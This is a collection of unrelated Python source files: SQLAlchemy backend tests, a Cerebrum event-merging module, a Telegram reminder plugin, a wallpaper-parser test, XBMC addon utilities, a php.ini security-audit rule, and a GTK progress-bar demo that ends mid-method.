        data = self.tables.some_table.c.data
        self._test(data.contains("b%cde"), {1, 2, 3, 4, 5, 6, 7, 8, 9})

    def test_contains_autoescape(self):
        data = self.tables.some_table.c.data
        self._test(data.contains("b%cde", autoescape=True), {3})

    def test_contains_escape(self):
        data = self.tables.some_table.c.data
        self._test(data.contains("b##cde", escape="#"), {7})

    def test_contains_autoescape_escape(self):
        data = self.tables.some_table.c.data
        self._test(data.contains("b%cd", autoescape=True, escape="#"), {3})
        self._test(data.contains("b#cd", autoescape=True, escape="#"), {7})


class ComputedColumnTest(fixtures.TablesTest):
    """Round trips for server-side computed (generated) columns."""

    __backend__ = True
    __requires__ = ("computed_columns",)

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "square",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("side", Integer),
            Column("area", Integer, Computed("side * side")),
            Column("perimeter", Integer, Computed("4 * side")),
        )

    @classmethod
    def insert_data(cls, connection):
        rows = [{"id": 1, "side": 10}, {"id": 10, "side": 42}]
        connection.execute(cls.tables.square.insert(), rows)

    def test_select_all(self):
        """SELECT * returns the computed values alongside stored ones."""
        square = self.tables.square
        stmt = select([text("*")]).select_from(square).order_by(square.c.id)
        with config.db.connect() as conn:
            rows = conn.execute(stmt).fetchall()
        eq_(rows, [(1, 10, 100, 40), (10, 42, 1764, 168)])

    def test_select_columns(self):
        """Computed columns can be selected explicitly."""
        square = self.tables.square
        stmt = (
            select([square.c.area, square.c.perimeter])
            .select_from(square)
            .order_by(square.c.id)
        )
        with config.db.connect() as conn:
            rows = conn.execute(stmt).fetchall()
        eq_(rows, [(100, 40), (1764, 168)])


class ExistsTest(fixtures.TablesTest):
    """Round trips for EXISTS subqueries."""

    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "stuff",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("data", String(50)),
        )

    @classmethod
    def insert_data(cls, connection):
        rows = [
            {"id": 1, "data": "some data"},
            {"id": 2, "data": "some data"},
            {"id": 3, "data": "some data"},
            {"id": 4, "data": "some other data"},
        ]
        connection.execute(cls.tables.stuff.insert(), rows)

    def test_select_exists(self, connection):
        """A satisfied EXISTS yields the literal row."""
        stuff = self.tables.stuff
        stmt = select([literal(1)]).where(
            exists().where(stuff.c.data == "some data")
        )
        eq_(connection.execute(stmt).fetchall(), [(1,)])

    def test_select_exists_false(self, connection):
        """An unsatisfied EXISTS yields no rows."""
        stuff = self.tables.stuff
        stmt = select([literal(1)]).where(
            exists().where(stuff.c.data == "no data")
        )
        eq_(connection.execute(stmt).fetchall(), [])


class IsOrIsNotDistinctFromTest(fixtures.TablesTest):
    """Round trips for IS DISTINCT FROM / IS NOT DISTINCT FROM."""

    __backend__ = True
    __requires__ = ("supports_is_distinct_from",)

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "is_distinct_test",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("col_a", Integer, nullable=True),
            Column("col_b", Integer, nullable=True),
        )

    @testing.combinations(
        ("both_int_different", 0, 1, 1),
        ("both_int_same", 1, 1, 0),
        ("one_null_first", None, 1, 1),
        ("one_null_second", 0, None, 1),
        ("both_null", None, None, 0),
        id_="iaaa",
        argnames="col_a_value, col_b_value, expected_row_count_for_is",
    )
    def test_is_or_isnot_distinct_from(
        self, col_a_value, col_b_value, expected_row_count_for_is, connection
    ):
        table = self.tables.is_distinct_test
        row = {"id": 1, "col_a": col_a_value, "col_b": col_b_value}
        connection.execute(table.insert(), [row])

        rows_for_is = connection.execute(
            table.select(table.c.col_a.is_distinct_from(table.c.col_b))
        ).fetchall()
        eq_(len(rows_for_is), expected_row_count_for_is)

        # The negated operator must match the complementary row count.
        expected_row_count_for_isnot = 0 if expected_row_count_for_is else 1
        rows_for_isnot = connection.execute(
            table.select(table.c.col_a.isnot_distinct_from(table.c.col_b))
        ).fetchall()
        eq_(len(rows_for_isnot), expected_row_count_for_isnot)

# encoding: utf-8
#
# Copyright 2017 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
""" An abstract event that can be stored in the database. """
from __future__ import absolute_import

import datetime
import itertools
import mx.DateTime
import pytz

import cereconf


class _VerbSingleton(type):
    """ A metaclass that makes each EventType verb a singleton. """

    verbs = {}

    def __call__(cls, verb, *args):
        if verb not in cls.verbs:
            cls.verbs[verb] = super(_VerbSingleton, cls).__call__(verb, *args)
        return cls.verbs[verb]

    def get_verb(cls, verb):
        return cls.verbs.get(verb)


class EventType(_VerbSingleton('EventTypeSingleton', (object,), {})):
    """Holds an event type.

    Instances are interned by verb via the _VerbSingleton metaclass.
    """

    __slots__ = ['verb', 'description', ]

    def __init__(self, verb, description):
        """ Initialize EventType.

        :verb: Scim verb
        :description: HR description text
        """
        self.verb = verb
        self.description = description

    def __repr__(self):
        return '<{0} {1}>'.format(type(self).__name__, self.verb)

    def __eq__(self, other):
        """Two event types are equal iff their verbs match."""
        if not isinstance(other, EventType):
            return False
        return other.verb == self.verb

    def __hash__(self):
        """Hash on the verb, consistent with __eq__."""
        return hash(self.verb)


# Define event types:
# Because of the _VerbSingleton metaclass, constructing an EventType with one
# of these verbs anywhere in the process returns the same instance.

ADD = EventType('add', 'Add an object to subject')
CREATE = EventType('create', 'Create a new subject')
ACTIVATE = EventType('activate', 'Subject has no longer quarantines in system')
MODIFY = EventType('modify', 'Attributes has changed')
DEACTIVATE = EventType('deactivate', 'Quarantine is activated')
DELETE = EventType('delete', 'Subject is deleted')
REMOVE = EventType('remove', 'Remove an object from subject')
PASSWORD = EventType('password', 'Subject has changed password')
JOIN = EventType('join', 'Join two objects')


class EntityRef(object):
    """ Representation of a single entity.

    The entity_id can be used internally to identify which object we reference

    The entity_type and ident is used to generate a reference to the object
    that other systems can use.
    """

    __slots__ = ['ident', 'entity_type', 'entity_id', ]

    def __init__(self, entity_id, entity_type, ident):
        # entity_id is normalized to int so equality works across sources.
        self.entity_id = int(entity_id)
        self.entity_type = entity_type
        self.ident = ident

    def __repr__(self):
        return '<%s id=%r type=%r ident=%r>' % (
            type(self).__name__, self.entity_id, self.entity_type, self.ident)

    def __eq__(self, other):
        """Equality considers only the internal entity_id."""
        if not isinstance(other, EntityRef):
            return False
        return self.entity_id == other.entity_id

    def to_dict(self):
        """Serialize this reference as a plain dict."""
        return dict(
            ident=self.ident,
            entity_id=self.entity_id,
            entity_type=self.entity_type,
        )


class DateTimeDescriptor(object):
    """ Datetime descriptor that handles timezones.

    When setting the datetime, this method will try to localize it with the
    default_timezone in the following ways:

    - mx.DateTime.DateTimeType: Naive datetime, assume in default_timezone
    - datetime.datetime: Assume in default_timezone if naive
    - integer: Assume timestamp in UTC

    The returned object will always be a localized datetime.datetime

    """

    default_timezone = pytz.timezone(cereconf.TIMEZONE)

    def __init__(self, slot):
        """ Creates a new datetime descriptor.

        :param str slot:
            The attribute name where the actual value is stored.
        """
        self.slot = slot

    def __repr__(self):
        return '{0.__class__.__name__}({0.slot!r})'.format(self)

    def __get__(self, obj, cls=None):
        # BUGFIX: was `if not obj`, which also returned the descriptor for a
        # *falsy* instance; the descriptor protocol passes obj=None only for
        # class-level access.
        if obj is None:
            return self
        # Unset slot reads as None rather than raising AttributeError.
        return getattr(obj, self.slot, None)

    def __set__(self, obj, value):
        if value is None:
            self.__delete__(obj)
            return

        if isinstance(value, (int, long, )):
            # POSIX timestamp, defined as seconds since the epoch in UTC.
            # BUGFIX: fromtimestamp() converts to *local* time; labelling that
            # result as UTC shifted the instant unless the host ran in UTC.
            value = pytz.utc.localize(
                datetime.datetime.utcfromtimestamp(value))
        elif isinstance(value, mx.DateTime.DateTimeType):
            # Naive datetime in default_timezone
            value = self.default_timezone.localize(value.pydatetime())
        elif isinstance(value, datetime.datetime):
            if value.tzinfo is None:
                value = self.default_timezone.localize(value)
        else:
            raise TypeError('Invalid datetime {0} ({1})'.format(type(value),
                                                                repr(value)))

        setattr(obj, self.slot, value)

    def __delete__(self, obj):
        if hasattr(obj, self.slot):
            delattr(obj, self.slot)


class Event(object):
    """ Event abstraction.

    Contains all the necessary data to serialize an event.
    """

    DEFAULT_TIMEZONE = 'Europe/Oslo'

    # Slots include the two private storage slots used by the
    # DateTimeDescriptor class attributes below.
    __slots__ = ['event_type', 'subject', 'objects', 'context', 'attributes',
                 '_timestamp', '_scheduled', ]

    # When the event originated / when it should be issued (tz-aware).
    timestamp = DateTimeDescriptor('_timestamp')
    scheduled = DateTimeDescriptor('_scheduled')

    def __init__(self, event_type,
                 subject=None,
                 objects=None,
                 context=None,
                 attributes=None,
                 timestamp=None,
                 scheduled=None):
        """
        :param EventType event: the type of event
        :param EntityRef subject: reference to the affected entity
        :param list objects: sequence of other affected objects (EntityRef)
        :param list context: sequence of affected systems (str)
        :param list attributes: sequence of affected attributes (str)
        :param datetime timestamp: when the event originated
        :param datetime schedule: when the event should be issued
        """
        self.event_type = event_type
        self.subject = subject
        self.timestamp = timestamp
        self.scheduled = scheduled
        # Defensive copies: callers may pass any iterable (or None).
        self.objects = set(objects or [])
        self.context = set(context or [])
        self.attributes = set(attributes or [])

    def __repr__(self):
        return ('<{0.__class__.__name__}'
                ' event={0.event_type!r}'
                ' subject={0.subject!r}>').format(self)

    def mergeable(self, other):
        """Can this event be merged with other."""

        # Scheduled (delayed) events are delivered as-is, never merged.
        if self.scheduled is not None:
            return False
        # Only events about the same subject can be merged.
        if self.subject != other.subject:
            return False
        # create absorbs everything except deactivate/remove.
        if self.event_type == CREATE:
            return other.event_type not in (DEACTIVATE, REMOVE)
        # delete absorbs most other event types.
        if self.event_type == DELETE:
            return other.event_type in (REMOVE, DEACTIVATE, ADD, ACTIVATE,
                                        MODIFY, PASSWORD)
        # Same membership-style event type merges regardless of context.
        # NOTE(review): this check deliberately precedes the context
        # comparison below, so e.g. two ADDs with different contexts are
        # still considered mergeable -- confirm this is intended.
        if (self.event_type == other.event_type and
                self.event_type in (ADD, REMOVE, ACTIVATE, DEACTIVATE)):
            return True
        if self.context != other.context:
            return False
        return True

    def merge(self, other):
        """Merge messages.

        :return: a list of the events remaining after the merge --
            [], [self], [other] or [self, other].
        """
        def ret_self():
            # Keep only self, absorbing other's object references.
            self.objects.update(other.objects)
            return [self]

        if not self.mergeable(other):
            return [self, other]
        if self.event_type == CREATE:
            if other.event_type == DELETE:
                # create followed by delete cancels out entirely.
                return []
            if other.event_type == ADD:
                self.context.update(other.context)
                return ret_self()
            if other.event_type == ACTIVATE:
                return ret_self()  # TODO: if quarantine is an attr, delete it
            if other.event_type == MODIFY:
                self.attributes.update(other.attributes)
                return ret_self()
            if other.event_type == PASSWORD:
                self.attributes.add('password')
                return ret_self()
        elif self.event_type == DELETE:
            # delete swallows the other event.
            return ret_self()
        elif other.event_type == DELETE:
            # A later delete supersedes this event.
            return [other]
        elif (ACTIVATE == self.event_type and
              DEACTIVATE == other.event_type and
              self.context == other.context):
            # activate + deactivate in the same context cancel out.
            return []
        elif (ADD == self.event_type and
              REMOVE == other.event_type and
              self.context == other.context):
            # add + remove in the same context cancel out.
            return []
        elif self.event_type == other.event_type:
            if self.event_type in (ADD, REMOVE, ACTIVATE, DEACTIVATE):
                self.context.update(other.context)
                return ret_self()
            if self.context != other.context:
                return [self, other]
            self.attributes.update(other.attributes)
            return ret_self()
        return [self, other]


def merge_events(events):
    """Merge events with similarities.

    As long as subject is the same:
    * create + add/activate/modify/password = create with attributes merged
    * create + deactivate/remove is untouched
    * create + delete should be removed

    * delete + remove/deactivate/add/activate/modify/password = delete

    * x + x = x
    * activate + deactivate = noop (careful with aud)

    Sort into canonical order:
    #. create
    #. delete
    #. add
    #. activate
    #. modify
    #. password
    #. deactivate
    #. remove
    """
    # Canonical ordering of event types (see docstring above).
    order = (CREATE, DELETE, ADD, ACTIVATE, MODIFY, PASSWORD, DEACTIVATE,
             REMOVE, JOIN)
    ps = [[] for x in order]

    # Bucket each event by its event type's position in the canonical order.
    for pl in events:
        pltype = pl.event_type
        idx = order.index(pltype)
        ps[idx].append(pl)

    # Regroup by subject; walking the buckets in order yields each subject's
    # events already canonically sorted.
    result = {}
    for idx, tp, pl in zip(range(len(order)), order, ps):
        for p in pl:
            if p.subject not in result:
                result[p.subject] = [p]
            else:
                result[p.subject].append(p)

    def merge_list(finished, merged, current, rest):
        # Repeatedly try to merge `current` with the head of `rest`.
        # Events that refuse to merge are parked in `merged` and retried
        # against the next `current` once `rest` is exhausted.
        # NOTE(review): the rotation below is order-sensitive; documented
        # from reading the code, not from a specification.
        while rest or merged:
            if rest:
                new = current.merge(rest[0])
                if not new:
                    # current and rest[0] cancelled each other out.
                    rest.pop(0)
                    merged.extend(rest)
                    rest = merged
                    if not rest:
                        return finished
                    merged = []
                    current = rest.pop(0)
                elif len(new) == 1:
                    if new[0] is not current:
                        # The head superseded current (e.g. a later delete);
                        # restart with the parked events plus the remainder.
                        merged.extend(rest)
                        rest = merged
                        current = rest.pop(0)
                        merged = []
                    else:
                        # Head was absorbed into current; discard it.
                        rest.pop(0)
                else:
                    # No merge possible; park the head for a later pass.
                    merged.append(rest.pop(0))
            else:  # merged is not empty
                finished.append(current)
                rest = merged
                merged = []
                current = rest.pop(0)
        finished.append(current)
        return finished

    # Collapse each subject's event list, then flatten all subjects.
    for sub, lst in result.items():
        result[sub] = merge_list([], [], lst[0], lst[1:])
    return list(itertools.chain(*result.values()))

# -*- coding: utf-8 -*-
from utils import *

# Regex patterns that trigger this plugin.
commands = [
    '^remindme',
    '^reminder',
    '^remind$',
    '^r '
]

# (name, required) pairs describing the expected arguments.
parameters = (
    ('delay', True),
    ('message', True),
)

description = 'Set a reminder for yourself. First argument is delay until you wish to be reminded.\nExample: `' + config['command_start'] + 'remindme 2h GiT GuD`'
action = 'typing'
hidden = True

# Persistent reminder store; keys are creation timestamps (see run()).
reminders = load_json('data/reminders.json')

def to_seconds(time, unit):
    """Convert a numeric string and a unit suffix to seconds.

    :param time: numeric string (or number), e.g. '2'
    :param unit: one of 's', 'm', 'h', 'd'
    :return: the delay in seconds as a float, or None for an unknown unit
        (preserves the original implicit-None behavior, which callers rely
        on to detect bad input).
    """
    multipliers = {
        's': 1,
        'm': 60,
        'h': 60 * 60,
        'd': 60 * 60 * 24,
    }
    if unit not in multipliers:
        return None
    return float(time) * multipliers[unit]

def run(msg):
    """Handle a message: parse '<delay> <text>' and store a reminder."""
    input = get_input(msg['text'])

    if not input:
        doc = get_doc(commands, parameters, description)
        return send_message(msg['chat']['id'], doc,
                            parse_mode="Markdown")

    # BUGFIX: define the error text up front -- the original only assigned
    # `message` inside the format-check branch, so the `except` below could
    # hit a NameError when replying.
    message = 'The delay must be in this format: `(integer)(s|m|h|d)`.\nExample: `2h` for 2 hours.'

    delay = first_word(input)
    time = delay[:-1]
    unit = delay[-1:]
    if not is_int(time) or is_int(unit):
        return send_message(msg['chat']['id'], message, parse_mode="Markdown")

    try:
        alarm = now() + to_seconds(time, unit)
    except Exception:
        # to_seconds() returns None for an unknown unit, making the addition
        # raise TypeError. (Narrowed from a bare except, which would also
        # swallow SystemExit/KeyboardInterrupt.)
        return send_message(msg['chat']['id'], message, parse_mode="Markdown")

    text = all_but_first_word(input)
    if not text:
        # BUGFIX: the original fell through after this reply and crashed on
        # the concatenation below; stop here instead.
        return send_message(msg['chat']['id'], 'Please include a reminder.')

    if 'username' in msg['from']:
        text += '\n@' + msg['from']['username']

    reminder = OrderedDict()
    reminder['alarm'] = alarm
    reminder['chat_id'] = msg['chat']['id']
    reminder['text'] = text

    reminders[int(now())] = reminder
    save_json('data/reminders.json', reminders)

    # Expand the unit suffix for the confirmation, e.g. '2h' -> '2 hours'.
    # By this point unit is guaranteed to be one of s/m/h/d (anything else
    # was rejected above), but .get keeps the fallback harmless.
    unit_names = {'s': ' seconds', 'm': ' minutes', 'h': ' hours', 'd': ' days'}
    delay = delay.replace(unit, unit_names.get(unit, unit))

    message = 'Your reminder has been set for *' + delay + '* from now:\n\n' + text
    send_message(msg['chat']['id'], message, parse_mode="Markdown")

def cron():
    """Periodic task: deliver due reminders and drop them from the store."""
    reminders = load_json('data/reminders.json', True)
    # BUGFIX: the original deleted keys while iterating reminders.items(),
    # which raises RuntimeError on Python 3. Collect the due keys first,
    # then mutate, and persist once at the end instead of per deletion.
    due = [key for key, reminder in reminders.items()
           if now() > reminder['alarm']]
    for key in due:
        reminder = reminders.pop(key)
        send_message(reminder['chat_id'], reminder['text'])
    if due:
        save_json('data/reminders.json', reminders)

#
# Walldo - A wallpaper downloader
# Copyright (C) 2012  Fernando Castillo 
# 
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# 
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# 
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

import unittest 
from walldo.parser import Parser;

class ParserTestCase(unittest.TestCase):
    """Checks that Parser.parse extracts the wallpaper URL for a resolution."""

    lines = ['<select class="select" style="margin: 0 2px 0 0; margin-top: 4px; float: left; width: 145px; max-width: 145px;" name="resolution" onChange="javascript:imgload(\'ithilien\', this,\'2949\')">']
    expected = ['/wallpaper/7yz4ma1/2949_ithilien_1024x768.jpg']

    def setUp(self):
        self.parser = Parser()

    def testParse(self):
        current = self.parser.parse(self.lines, '1024x768')
        # BUGFIX: the original only looped over `current`, so an empty or
        # short result passed vacuously; compare lengths explicitly. Also
        # use assertEqual -- assertEquals is a deprecated alias.
        self.assertEqual(len(self.expected), len(current),
                         'Wrong number of entries')
        for expected_entry, entry in zip(self.expected, current):
            self.assertEqual(expected_entry, entry, 'Entry incorrect')

"""
    SALTS XBMC Addon
    Copyright (C) 2015 tknorris

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""
import xbmcaddon
import xbmcplugin
import xbmcgui
import xbmc
import xbmcvfs
import urllib
import urlparse
import sys
import os
import re

# Singleton handle for this addon, plus short aliases for its settings API.
addon = xbmcaddon.Addon()
get_setting = addon.getSetting
show_settings = addon.openSettings

def get_path():
    """Return the addon install path as unicode (Python 2 bytes -> utf-8)."""
    return addon.getAddonInfo('path').decode('utf-8')

def get_profile():
    """Return the addon profile (user data) path as unicode."""
    return addon.getAddonInfo('profile').decode('utf-8')

def translate_path(path):
    """Resolve a special:// path to a real filesystem path, as unicode."""
    return xbmc.translatePath(path).decode('utf-8')

def set_setting(id, value):
    """Persist an addon setting; non-string values are coerced with str()."""
    if not isinstance(value, basestring): value = str(value)
    addon.setSetting(id, value)

def get_version():
    """Return the addon version string from its metadata."""
    return addon.getAddonInfo('version')

def get_id():
    """Return the addon id from its metadata."""
    return addon.getAddonInfo('id')

def get_name():
    """Return the addon display name from its metadata."""
    return addon.getAddonInfo('name')

def get_plugin_url(queries):
    """Build this plugin's URL from a dict of query parameters."""
    try:
        query = urllib.urlencode(queries)
    except UnicodeEncodeError:
        # urlencode chokes on non-ascii unicode values: utf-8 encode them
        # in place and retry.
        for key in queries:
            value = queries[key]
            if isinstance(value, unicode):
                queries[key] = value.encode('utf-8')
        query = urllib.urlencode(queries)
    return sys.argv[0] + '?' + query

def end_of_directory(cache_to_disc=True):
    """Signal the end of the current directory listing to XBMC."""
    xbmcplugin.endOfDirectory(int(sys.argv[1]), cacheToDisc=cache_to_disc)

def set_content(content):
    """Declare the content type (e.g. 'movies') for the current listing."""
    xbmcplugin.setContent(int(sys.argv[1]), content)
    
def create_item(queries, label, thumb='', fanart='', is_folder=None, is_playable=None, total_items=0, menu_items=None, replace_menu=False):
    """Create a ListItem for *label*/*thumb* and delegate to add_item()."""
    list_item = xbmcgui.ListItem(label, iconImage=thumb, thumbnailImage=thumb)
    add_item(queries, list_item, fanart, is_folder, is_playable, total_items, menu_items, replace_menu)

def add_item(queries, list_item, fanart='', is_folder=None, is_playable=None, total_items=0, menu_items=None, replace_menu=False):
    """Finish a ListItem (fanart, info, context menu) and add it to the directory."""
    if menu_items is None:
        menu_items = []
    # Unspecified folder-ness defaults to the opposite of playability.
    if is_folder is None:
        is_folder = not is_playable

    if is_playable is None:
        playable = 'false' if is_folder else 'true'
    else:
        playable = 'true' if is_playable else 'false'

    url = get_plugin_url(queries)
    if fanart:
        list_item.setProperty('fanart_image', fanart)
    list_item.setInfo('video', {'title': list_item.getLabel()})
    list_item.setProperty('isPlayable', playable)
    list_item.addContextMenuItems(menu_items, replaceItems=replace_menu)
    xbmcplugin.addDirectoryItem(int(sys.argv[1]), url, list_item, isFolder=is_folder, totalItems=total_items)

def parse_query(query):
    """Parse a plugin URL query string into a dict (default mode: 'main').

    Single-valued parameters are unwrapped from their list.
    """
    if query.startswith('?'):
        query = query[1:]
    q = {'mode': 'main'}
    for key, values in urlparse.parse_qs(query).items():
        q[key] = values[0] if len(values) == 1 else values
    return q

def notify(header=None, msg='', duration=2000, sound=None):
    """Show a toast notification.

    Falls back to the XBMC.Notification builtin on versions without
    Dialog().notification().
    """
    if header is None: header = get_name()
    if sound is None: sound = get_setting('mute_notifications') == 'false'
    icon_path = os.path.join(get_path(), 'icon.png')
    try:
        xbmcgui.Dialog().notification(header, msg, icon_path, duration, sound)
    except Exception:
        # BUGFIX: narrowed from a bare except, which also swallowed
        # SystemExit/KeyboardInterrupt.
        builtin = "XBMC.Notification(%s,%s, %s, %s)" % (header, msg, duration, icon_path)
        xbmc.executebuiltin(builtin)
    
def get_current_view():
    """Return the current skin's video view id, or None if undetectable."""
    skinPath = translate_path('special://skin/')
    xml = os.path.join(skinPath, 'addon.xml')
    f = xbmcvfs.File(xml)
    read = f.read()
    f.close()
    # re.search returns None when the pattern is absent, so .group(1) raises
    # AttributeError. BUGFIX: narrowed from bare excepts, which also hid
    # real errors (and SystemExit/KeyboardInterrupt).
    try:
        src = re.search('defaultresolution="([^"]+)', read, re.DOTALL).group(1)
    except AttributeError:
        src = re.search('<res.+?folder="([^"]+)', read, re.DOTALL).group(1)
    src = os.path.join(skinPath, src, 'MyVideoNav.xml')
    f = xbmcvfs.File(src)
    read = f.read()
    f.close()
    match = re.search('<views>([^<]+)', read, re.DOTALL)
    if match:
        views = match.group(1)
        for view in views.split(','):
            # The first view id the skin actually knows about wins.
            if xbmc.getInfoLabel('Control.GetLabel(%s)' % (view)):
                return view

# -*- coding: utf-8 -*-
#
# HnTool rules - php
# Copyright (C) 2009-2010 Candido Vieira <cvieira.br@gmail.com>
#
#   This program is free software; you can redistribute it and/or modify
#   it under the terms of the GNU General Public License as published by
#   the Free Software Foundation; either version 2 of the License, or
#   (at your option) any later version.
#
#   This program is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#   GNU General Public License for more details.
#
#   You should have received a copy of the GNU General Public License
#   along with this program; if not, write to the Free Software
#   Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#

import os
import ConfigParser
import HnTool.modules.util
from HnTool.modules.rule import Rule as MasterRule

class Rule(MasterRule):
    """HnTool rule that audits php.ini files for insecure settings."""

    def __init__(self, options):
        MasterRule.__init__(self, options)
        self.short_name="php"
        self.long_name="Checks security problems on php config file"
        self.type="config"
        # Common php.ini locations; only the ones that exist are analyzed.
        self.required_files = ['/etc/php5/apache2/php.ini', '/etc/php5/cli/php.ini', '/etc/php.ini']

    def requires(self):
        """Return the config files this rule wants to inspect."""
        return self.required_files

    def analyze(self, options):
        """Scan each existing php.ini and append findings to check_results.

        Findings are bucketed by severity key ('ok', 'info', 'low',
        'medium') in the check_results mapping inherited from MasterRule.
        """
        check_results = self.check_results
        conf_files = self.required_files

        for php_conf in conf_files:
            if os.path.isfile(php_conf):

                # php.ini is INI-formatted, so ConfigParser can read it.
                config = ConfigParser.ConfigParser()

                try:
                    config.read(php_conf)
                except ConfigParser.ParsingError, (errno, strerror):
                    check_results['info'].append('Could not parse %s: %s' % (php_conf, strerror))
                    continue

                if not config.has_section('PHP'):
                    check_results['info'].append('%s is not a PHP config file' % (php_conf))
                    continue

                # register_globals: injecting request data into globals.
                if config.has_option('PHP', 'register_globals'):
                    rg = config.get('PHP', 'register_globals').lower()
                    if rg == 'on':
                        check_results['medium'].append('Register globals is on (%s)' % (php_conf))
                    elif rg == 'off':
                        check_results['ok'].append('Register globals is off (%s)' % (php_conf))
                    else:
                        check_results['info'].append('Unknown value for register globals (%s)' % (php_conf))
                else:
                    check_results['info'].append('Register globals not found (%s)' % (php_conf))

                # safe_mode: deprecated, gives a false sense of security.
                if config.has_option('PHP', 'safe_mode'):
                    sm = config.get('PHP', 'safe_mode').lower()
                    if sm == 'on':
                        check_results['low'].append('Safe mode is on (fake security) (%s)' % (php_conf))
                    elif sm == 'off':
                        check_results['info'].append('Safe mode is off (%s)' % (php_conf))
                    else:
                        check_results['info'].append('Unknown value for safe mode (%s)' % (php_conf))
                else:
                    check_results['info'].append('Safe mode not found (%s)' % (php_conf))

                # display_errors: leaking errors to page output.
                if config.has_option('PHP', 'display_errors'):
                    de = config.get('PHP', 'display_errors').lower()
                    if de == 'on':
                        check_results['medium'].append('Display errors is on (stdout) (%s)' % (php_conf))
                    elif de == 'off':
                        check_results['ok'].append('Display errors is off (%s)' % (php_conf))
                    elif de == 'stderr':
                        check_results['info'].append('Display errors set to stderr (%s)' % (php_conf))
                    else:
                        check_results['info'].append('Unknown value for display errors (%s)' % (php_conf))
                else:
                    check_results['info'].append('Display errors not found (%s)' % (php_conf))

                # expose_php: advertising the PHP version in headers.
                if config.has_option('PHP', 'expose_php'):
                    ep = config.get('PHP', 'expose_php').lower()
                    if ep == 'on':
                        check_results['low'].append('Expose PHP is on (%s)' % (php_conf))
                    elif ep == 'off':
                        check_results['ok'].append('Expose PHP is off (%s)' % (php_conf))
                    else:
                        check_results['info'].append('Unknown value for expose PHP (%s)' % (php_conf))
                else:
                    check_results['info'].append('Expose PHP not found (%s)' % (php_conf))

        return check_results

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#       progreso.py
#
#       Copyright 2010 Jesús Hómez <jesus@jesus-laptop>
#
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.
import gtk, time
import threading
import thread
import gobject
# Initialize GDK thread support before any GTK calls; required because
# the progress loop below runs on a worker thread.
gtk.gdk.threads_init()
#La clase App hereda threading.Thread
class App(threading.Thread):
    """GTK progress-bar demo driven from a background thread.

    Loads widgets from ``progreso.glade`` and, while ``togglebutton1`` is
    active, advances ``progressbar1`` by 1% per second from a worker
    thread started with ``thread.start_new_thread``.
    """

    def __init__(self):
        # Constructor: look up widgets and wire up signal handlers.
        self.glade_file = "progreso.glade"
        self.glade = gtk.Builder()
        self.glade.add_from_file(self.glade_file)
        self.window1 = self.glade.get_object('window1')
        self.togglebutton1 = self.glade.get_object('togglebutton1')
        self.button1 = self.glade.get_object('button1')
        self.progressbar1 = self.glade.get_object('progressbar1')
        self.new_val = 0.0
        # Last displayed percentage.  Pre-set so on_togglebutton1_toggled
        # cannot hit an AttributeError if the button is toggled off before
        # the first iteration runs (a latent bug in the original).
        self.x = 0.0
        self.rango = 60
        # Initial progress value 0.0, pulse step 0.1.
        self.progressbar1.set_fraction(self.new_val)
        self.progressbar1.set_pulse_step(0.1)
        self.window1.connect("destroy", self.on_window1_destroy)
        self.button1.connect('clicked', self.on_button1_clicked)
        self.togglebutton1.connect('toggled', self.on_togglebutton1_toggled)
        # Initialize the Thread base class.  NOTE(review): run()/start()
        # are never used; the worker is spawned via thread.start_new_thread.
        threading.Thread.__init__(self)
        self.window1.show_all()

    def on_window1_destroy(self, *args):
        # This handler was connected but never defined in the original,
        # which made construction fail.  Quit the main loop on close.
        gtk.main_quit()

    def on_button1_clicked(self, *args):
        # Connected but never defined in the original; intent is not
        # recoverable from the source -- TODO confirm desired action.
        pass

    def __iteracion__(self):
        # Advance the progress bar by 1% per second while the toggle
        # button stays active; stop and reset when it passes 100%.
        for i in range(self.rango):
            if self.togglebutton1.get_active():
                self.new_val = self.progressbar1.get_fraction() + 0.01
                if self.new_val > 1.0:
                    self.new_val = 0.0
                    self.togglebutton1.set_active(False)
                    break
                else:
                    time.sleep(1)
                    self.x = self.new_val * 100
